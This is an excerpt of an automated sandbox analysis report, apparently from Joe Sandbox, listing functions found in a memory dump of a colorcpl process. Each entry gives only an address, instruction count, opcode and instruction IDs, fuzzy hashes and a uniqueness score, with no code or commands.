                                                                                                    • Opcode ID: 8d62f7887e20056bdbcfa7bdcd80b6c74bcef62de8c245b851eeb3e4bfdd23e7
                                                                                                    • Instruction ID: fa2d9feffe23e1c4d1b30fd1ba6985237e55bf171bc0d759fdd6046d684aa46f
                                                                                                    • Opcode Fuzzy Hash: 8d62f7887e20056bdbcfa7bdcd80b6c74bcef62de8c245b851eeb3e4bfdd23e7
                                                                                                    • Instruction Fuzzy Hash: 7D229235B00256CFCB09CF59C4A0AAAB7F2FF8A354B64866DD455DB346DB30E942CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6F1D5A Relevance: .6, Instructions: 559COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 26d3a2e675645c26d8ac8211017c3b47aa2daf60e4a1ca58853fc5b3514e9e9a
                                                                                                    • Instruction ID: e1410a40c9d3fce70cd7de692516dc509be51c04e7d94b47fa1fdeb7a8a700e2
                                                                                                    • Opcode Fuzzy Hash: 26d3a2e675645c26d8ac8211017c3b47aa2daf60e4a1ca58853fc5b3514e9e9a
                                                                                                    • Instruction Fuzzy Hash: E622A075615252CFC708CF19C4A0A1AB3E2FF8A714B948B6DE996CB355DB30E842CF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E63F950 Relevance: .4, Instructions: 423COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 116976fa22fe62b4b944a03466edb1593035b6e5f33dfc50baee33c8be66b894
                                                                                                    • Instruction ID: 18d073314fb0170e572192dfe1d15bdb1922f996846948f52adf25c60918605f
                                                                                                    • Opcode Fuzzy Hash: 116976fa22fe62b4b944a03466edb1593035b6e5f33dfc50baee33c8be66b894
                                                                                                    • Instruction Fuzzy Hash: 7AF1C7B5E10219CFDF14CF59C8906EE77B2FF49302FA5461AE88A9B350E7359981CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6438E0 Relevance: .3, Instructions: 349COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4fe9280d4a0e0b7482db0923039418b58effdf2c905f3eb24c082cde2cc9f2b8
                                                                                                    • Instruction ID: 2141e5cd03a90aaec847ab66cf703ce1f1eacd681055779f73c4c7ccb511cd65
                                                                                                    • Opcode Fuzzy Hash: 4fe9280d4a0e0b7482db0923039418b58effdf2c905f3eb24c082cde2cc9f2b8
                                                                                                    • Instruction Fuzzy Hash: AFE19D75A00246CFDB18CF59C990AAEB7F2FF58310F648269E855AB394D730EA41CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E671843 Relevance: .3, Instructions: 322COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9a11f83fa8bec8abffe4549c80cfd16bf8ed89c4a1d46f126788460770300069
                                                                                                    • Instruction ID: eac732a459389e6d286f66727fd7142971399cbef182b77e056f34b269e3a238
                                                                                                    • Opcode Fuzzy Hash: 9a11f83fa8bec8abffe4549c80cfd16bf8ed89c4a1d46f126788460770300069
                                                                                                    • Instruction Fuzzy Hash: 24D11675A01245DFDB41CF68C580B867BFABF49340F9446BAEE099B216E730E905CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6338C4 Relevance: .3, Instructions: 303COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ec23f0d41561d06f85b5a3382feffd42b03b0ae7357955e2ac7b85773b8eefbd
                                                                                                    • Instruction ID: 32745de3c2616cb8b5c5d11139b61193cbe71fed5760d58d512d2b461bba8445
                                                                                                    • Opcode Fuzzy Hash: ec23f0d41561d06f85b5a3382feffd42b03b0ae7357955e2ac7b85773b8eefbd
                                                                                                    • Instruction Fuzzy Hash: 00C154B5941249DFDB15CFA9C980A9EBBF5FF48300F61462AE42AEB350E734A901CF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6B5960 Relevance: .2, Instructions: 246COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 8990bef4a4e221cde88aa50ea925ab6ce86974a1ee3f0eefe7b8ed6151751f49
                                                                                                    • Instruction ID: 0fc912959176ed21d3db266d94acc65430a64bb57bd3b109635178d0dbbe309b
                                                                                                    • Opcode Fuzzy Hash: 8990bef4a4e221cde88aa50ea925ab6ce86974a1ee3f0eefe7b8ed6151751f49
                                                                                                    • Instruction Fuzzy Hash: 54812EB5E00349ABDB11DFA5CC94E9FBBBDEF49B10F500A29B615A7290DB70E900CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6CB890 Relevance: .2, Instructions: 236COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a68976729f5c169c2c591d8d466e275be043a451543eb67d35ccfe498a6cbed1
                                                                                                    • Instruction ID: fc880517a2427afdf05be77a82bd05ac6de75de39890bfe16e29a136dff78d5b
                                                                                                    • Opcode Fuzzy Hash: a68976729f5c169c2c591d8d466e275be043a451543eb67d35ccfe498a6cbed1
                                                                                                    • Instruction Fuzzy Hash: 2191E67190026D9FCB10CF64CC80BD9B3B5EF0A314F448AE5EA8AA7245D734AE91DF95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E661FCD Relevance: .2, Instructions: 210COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d45cff9eebf7e4d22c1ce3fcc24b15a1b095a5fa2b2ce0eacfdb7ef7a7161c41
                                                                                                    • Instruction ID: 4d4060b2291a9537341d799e464af8f461b14e5a35909a1b307ec94bf195c109
                                                                                                    • Opcode Fuzzy Hash: d45cff9eebf7e4d22c1ce3fcc24b15a1b095a5fa2b2ce0eacfdb7ef7a7161c41
                                                                                                    • Instruction Fuzzy Hash: 21818B74A00746EFCB15CF69C584B9ABBF5FF49700F50866AEA56C7281D730E981CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6F9B8B Relevance: .2, Instructions: 210COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: eb8e329786ed3226362e7135d761cd9a0203bf70625460d6ab447a1872867629
                                                                                                    • Instruction ID: 44cb54aeadd8c7bf3708ba6435324f1fd8450211e8dc00c05bdf5880b6f5c46e
                                                                                                    • Opcode Fuzzy Hash: eb8e329786ed3226362e7135d761cd9a0203bf70625460d6ab447a1872867629
                                                                                                    • Instruction Fuzzy Hash: E661D230F01655DBDB05CEA9C8B0BBE77ABAF85310FA84729E811A7394DB30D941C7A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6E598D Relevance: .2, Instructions: 204COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 643b246fbc27cfd5caff990afe1bb125586548c3544133d1d752a6ae4043fe28
                                                                                                    • Instruction ID: b4fecd46a8bea0a4d598be66e840602fc8ec2aa09cd9431d18afdf2d0655bb2a
                                                                                                    • Opcode Fuzzy Hash: 643b246fbc27cfd5caff990afe1bb125586548c3544133d1d752a6ae4043fe28
                                                                                                    • Instruction Fuzzy Hash: EC611431E1225AAFDB10CF68C860BAE73B6EF44714F904669E851EBAC0F778D941C790
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6D375F Relevance: .2, Instructions: 201COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b453e2a542a727a47880bf9cde022b3139c440edf37ae600e7cf846494f4ba7c
                                                                                                    • Instruction ID: 2e63a164e2dcb34068d6fdc22df1e119e184c8aa0bb46585ce3372ea261a45ef
                                                                                                    • Opcode Fuzzy Hash: b453e2a542a727a47880bf9cde022b3139c440edf37ae600e7cf846494f4ba7c
                                                                                                    • Instruction Fuzzy Hash: F2719035E41265EFCB11DF98C880BADB7B6FF49710F914225E881AB250D730EC56CBA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6399BE Relevance: .2, Instructions: 178COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a918266c555bc9c56286fd2653cabd174933d0401353a108cafa421f2824d6d4
                                                                                                    • Instruction ID: c2d97fbed297bfa0007ed942054f738ddb516d344884210bfec304fdc160d950
                                                                                                    • Opcode Fuzzy Hash: a918266c555bc9c56286fd2653cabd174933d0401353a108cafa421f2824d6d4
                                                                                                    • Instruction Fuzzy Hash: C251D531E00216DFDB08CF95C4916AEB7B6FF45312FA94769D80A9B25CE730A941CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6D3F90 Relevance: .2, Instructions: 171COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a31dbe6dfc4a698525db9a51b4a24bef273a25ad16d597e5d43bb7450578d510
                                                                                                    • Instruction ID: 54101df3d3795385399e9fd7471b6c9e6438be8962fc64eea3424e5cef01bb58
                                                                                                    • Opcode Fuzzy Hash: a31dbe6dfc4a698525db9a51b4a24bef273a25ad16d597e5d43bb7450578d510
                                                                                                    • Instruction Fuzzy Hash: 0D517D716083429FD704DF28D854AAAB7E6FF89314F958A2DF495C7250E730EC09CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E669B9F Relevance: .2, Instructions: 165COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 62ad84e35219e5a9bc8a8a1ae991dccca8fc5a249dbbe5d499c70fda0cb00df1
                                                                                                    • Instruction ID: 1fed1a5e29ee1e3b11e9cf676f276f0e4a6b36aa13a800978025a94505630f8f
                                                                                                    • Opcode Fuzzy Hash: 62ad84e35219e5a9bc8a8a1ae991dccca8fc5a249dbbe5d499c70fda0cb00df1
                                                                                                    • Instruction Fuzzy Hash: 8C616875E22656EFDB05CF68C540B8DBBF1BF89720F54862AE818AB351D734AD10CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6EBFC0 Relevance: .2, Instructions: 162COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 560d1a90ac210632884dd5a0a744483c9fa966326aad27594260bc11b19a8f02
                                                                                                    • Instruction ID: 9b767d86abe4ff99f3621756a18f4753bf946e04e1ed628c490d5f2782736eb9
                                                                                                    • Opcode Fuzzy Hash: 560d1a90ac210632884dd5a0a744483c9fa966326aad27594260bc11b19a8f02
                                                                                                    • Instruction Fuzzy Hash: 4D515C395022C696CB0CCF55C894AFEB3B6BF41744BD0835EE8558BA85E731DD82C790
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E627CD5 Relevance: .2, Instructions: 160COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 47a91ac88072500062ad43a9040f6ef7bfb9efe20abde585450629f2451819cc
                                                                                                    • Instruction ID: cdc2ef6e9b8c76187473cb8e606383d472df17a46e9bb370f94aace5cabacd86
                                                                                                    • Opcode Fuzzy Hash: 47a91ac88072500062ad43a9040f6ef7bfb9efe20abde585450629f2451819cc
                                                                                                    • Instruction Fuzzy Hash: 3151CC78506382ABD3218F24C841F6ABBE8FF54710F900E2DE49987660E734F840CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E643740 Relevance: .2, Instructions: 159COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9753cdc1167cd2a6f4b0c54e5efd4367c15a004b376de272da8817eb3c403daa
                                                                                                    • Instruction ID: 32b70ba6d31c148900896147f9ba6e3c03fd32c51655e4ab05e6f1835179fd89
                                                                                                    • Opcode Fuzzy Hash: 9753cdc1167cd2a6f4b0c54e5efd4367c15a004b376de272da8817eb3c403daa
                                                                                                    • Instruction Fuzzy Hash: 8C511075A51656AFC301CF68C4806ADBBB2FF45720FA08769E884DB740E734EA91CBC4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E703E10 Relevance: .1, Instructions: 148COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 389fb54456b3efe4ed5f525496ecf050ebde2f65efe6ce24bf3c6b148c4a960d
                                                                                                    • Instruction ID: 2437cc6bec653ddf606535ea6ce0af4688b2e1bb782fb8dc21b33a1b5dd3204d
                                                                                                    • Opcode Fuzzy Hash: 389fb54456b3efe4ed5f525496ecf050ebde2f65efe6ce24bf3c6b148c4a960d
                                                                                                    • Instruction Fuzzy Hash: 7D518A35B00A56AFEB05DF64C980B9ABBB6FF4A310F144665E905977A0DB70BD10CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6C5B50 Relevance: .1, Instructions: 148COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9d2034ad89b0a0fbdf7ee0086258f14be42ed2e899d470c887d8813522647b1c
                                                                                                    • Instruction ID: c9b64c9106a083f657375e160b0a43a80c80e1f5e43d5fe63f0584d50bbdf839
                                                                                                    • Opcode Fuzzy Hash: 9d2034ad89b0a0fbdf7ee0086258f14be42ed2e899d470c887d8813522647b1c
                                                                                                    • Instruction Fuzzy Hash: 8C5127B5A00619AFCB00CF58C881A9ABBF5FF09354B298699E818DB351D335ED61CBD4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E633FC2 Relevance: .1, Instructions: 147COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ea5783f37d6415028cf653ac5b6978d22a160581110b67bcef33c90d1936702f
                                                                                                    • Instruction ID: 23a09921259bfd869662c100a26ff4b68e8e64a0663c2c39cc3c1c38783781b4
                                                                                                    • Opcode Fuzzy Hash: ea5783f37d6415028cf653ac5b6978d22a160581110b67bcef33c90d1936702f
                                                                                                    • Instruction Fuzzy Hash: 5051BC79A01656CFCB04CFA8C590A9EFBF2BF49311F70862AD959A7344DB30AD40CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6D1CF9 Relevance: .1, Instructions: 143COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9103339e66cdf15444abf4378066a2b48a826036b288962e8b7ee6210dcc849d
                                                                                                    • Instruction ID: 8d39a7776e95cebc14e4738d3fd6c4b20f6cb4d310e5501fce197699d36b96b9
                                                                                                    • Opcode Fuzzy Hash: 9103339e66cdf15444abf4378066a2b48a826036b288962e8b7ee6210dcc849d
                                                                                                    • Instruction Fuzzy Hash: B241E131A00746EFEB04DE59C850B7AB3EAFF85750FD2866AE8909B211DBB0DD048790
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E703B80 Relevance: .1, Instructions: 139COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6b27d634f87aa19dd1661dd2d01d2114967b43c0e74a8ed6ef7dffb48ebf3818
                                                                                                    • Instruction ID: c3dbe8d90d2796c971fb57dc756a1f630fcf5bc26d71bad4667e9014232aba6c
                                                                                                    • Opcode Fuzzy Hash: 6b27d634f87aa19dd1661dd2d01d2114967b43c0e74a8ed6ef7dffb48ebf3818
                                                                                                    • Instruction Fuzzy Hash: C9515975605782AFE711CF29C980B57BBE6FF89314F004A2DE89ACB260D734E844CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E65DA20 Relevance: .1, Instructions: 133COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 515324ac438db481b324c7356584c7d63a70d61550a152daa8f2fbe4e8948685
                                                                                                    • Instruction ID: 4c0206e0a4be89ed0c779aa586b29c1bf6536e0b55106141080f43a16754b488
                                                                                                    • Opcode Fuzzy Hash: 515324ac438db481b324c7356584c7d63a70d61550a152daa8f2fbe4e8948685
                                                                                                    • Instruction Fuzzy Hash: 2441E972A057959FD321DF14C880B6BB3E9EF95B60F820B29E89457281DB30DC84DBD2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E627A80 Relevance: .1, Instructions: 133COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 12faedf2575a1b2c8fefdfa423e543861f4d4051b7d12e2bec8c6f78b6ab3680
                                                                                                    • Instruction ID: 1c38c369b56d08473ec8a27c65ce206d5978369b49c6a5746e3a99112bfaebfc
                                                                                                    • Opcode Fuzzy Hash: 12faedf2575a1b2c8fefdfa423e543861f4d4051b7d12e2bec8c6f78b6ab3680
                                                                                                    • Instruction Fuzzy Hash: 9541FF3A6093529BD320DF25CC80F5BB7A4AF84750F914A39F8969B290D725FC05CBE9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6EB9EE Relevance: .1, Instructions: 130COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: af0d6ed125fc3eb1725f8e0c8c8a362aa54d1a19c00bcb142e327c3af8729800
                                                                                                    • Instruction ID: 17d66aa1b517e4360ef5f858b29cf10071ed18d71f28151994f61c334f9613cf
                                                                                                    • Opcode Fuzzy Hash: af0d6ed125fc3eb1725f8e0c8c8a362aa54d1a19c00bcb142e327c3af8729800
                                                                                                    • Instruction Fuzzy Hash: 9D410775A01245EFDB20DFA8C854BAAB7B5EB48350F918529E806DB7C4DB70DD41C770
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E6DBA0B Relevance: .1, Instructions: 127COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ca1ac5d55d692f5f46498b90b45fcbb1537f4f259a80e997c9e8bbffb511a4be
                                                                                                    • Instruction ID: 5f54885ec9da779a40e0005b587b2be17ca8fd3a6375e37ef5b721cf346119f3
                                                                                                    • Opcode Fuzzy Hash: ca1ac5d55d692f5f46498b90b45fcbb1537f4f259a80e997c9e8bbffb511a4be
                                                                                                    • Instruction Fuzzy Hash: 39419D71A00B019FD715CF69C880B6AB7F6FF89700F81863DD59A97758DB30E9098B94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1E65D6E0 Relevance: .1, Instructions: 126COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b8b1c5c074f8c00d072c925b4cc93bd5c39739555662efb7dd38d1665bcaea9d
                                                                                                    • Instruction ID: 2fea591cf86f7f941f1d57be0bc3ad4809138addf763f41d30559058bea6d1c7
                                                                                                    • Opcode Fuzzy Hash: b8b1c5c074f8c00d072c925b4cc93bd5c39739555662efb7dd38d1665bcaea9d
                                                                                                    • Instruction Fuzzy Hash: A24123796052919FE320DF65C990F6B77A8EF49760F810B2DF82547290DB30E881DB96
                                                                                                    Uniqueness

